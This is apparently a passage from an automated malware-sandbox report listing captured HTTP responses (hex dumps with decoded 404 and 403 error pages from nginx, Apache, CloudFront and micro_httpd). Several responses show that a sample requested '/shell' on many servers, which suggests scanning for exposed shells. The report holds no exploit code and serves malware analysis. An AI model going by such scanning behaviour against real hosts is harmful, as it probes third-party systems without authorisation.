3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 20 63 6f 6c 6f 72 3a 23 61 61 61 3b 7d 2e 66 6f 6f 74 65 72 20 61 7b 20 63 6f 6c 6f 72 3a 23 36 36 36 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 2e 74 65 78 74 2d 63 65 6e 74 65 72 20 7b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 20 3c 68 31 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 57 65 62 73 69 74 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 20 54 68 65 20 77 65 62 73 69 74 65 20 79 6f 75 20 61 72 65 20 74 72 79 69 6e 67 20 74 6f 20 72 65 61 63 68 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 2f 70 3e 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Sat, 19 Feb 2022 10:06:02 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 75 74 69 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 6f 6e 4c 6f 61 64 3d 27 6c 6f 67 6f 75 74 32 28 29 27 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE><script language="javascript" src="util.js"></script></HEAD><BODY onLoad='logout2()' BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Feb 2022 15:06:09 GMTServer: ApacheVary: Accept-EncodingContent-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:07 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:06:07 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.4.6 (Ubuntu)Date: Sat, 19 Feb 2022 15:06:07 GMTContent-Type: text/htmlContent-Length: 177Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 34 2e 36 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.4.6 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:08 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Feb 2022 15:06:09 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:08 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Sat, 19 Feb 2022 15:06:11 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:12 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:13 GMTContent-Type: text/htmlContent-Length: 5891Connection: keep-aliveKeep-Alive: timeout=20Vary: Accept-EncodingETag: "5e3effd5-1703"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 43 6f 6e 66 69 67 75 72 65 64 20 7c 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 29 3b 0a 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 20 52 65 67 75 6c 61 72 27 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 32 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 30 70 78 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 30 70 78 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 42 43 43 38 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 72 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 44 46 44 46 44 46 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 70 78 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 30 70 78 20 30 20 33 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 42 43 43 38 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 0a 20 20 20 20 7d 0a 0a 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 20 7b 0a 09 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 61 64 6d 69 6e 20 7b 0a 09 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 7
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:16 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:16 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:03 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Sat, 19 Feb 2022 15:06:21 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:06:23 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 19 Feb 2022 15:06:29 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Feb 2022 15:06:30 GMTServer: Apache/2.2.22 (Win32) PHP/5.2.9-2Content-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Sat, 19 Feb 2022 15:06:33 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
